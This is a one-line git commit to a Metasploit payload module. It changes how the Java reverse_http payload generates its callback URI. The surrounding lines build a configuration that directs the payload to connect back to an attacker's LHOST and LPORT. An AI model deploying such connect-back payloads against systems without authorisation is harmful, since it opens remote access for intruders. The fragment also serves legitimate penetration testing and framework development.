use generate_uri_uuid_mode for java reverse_http

bug/bundler_fix
Brent Cook 2016-02-19 07:58:16 -06:00
parent edd30e433e
commit c596421b01
1 changed files with 1 additions and 1 deletions

View File

@ -54,7 +54,7 @@ module MetasploitModule
c << "URL=http://#{datastore["LHOST"]}"
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
c << "#{luri}"
c << generate_uri_checksum(:init_java, uri_req_len)
c << generate_uri_uuid_mode(:init_java, uri_req_len)
c << "\n"
c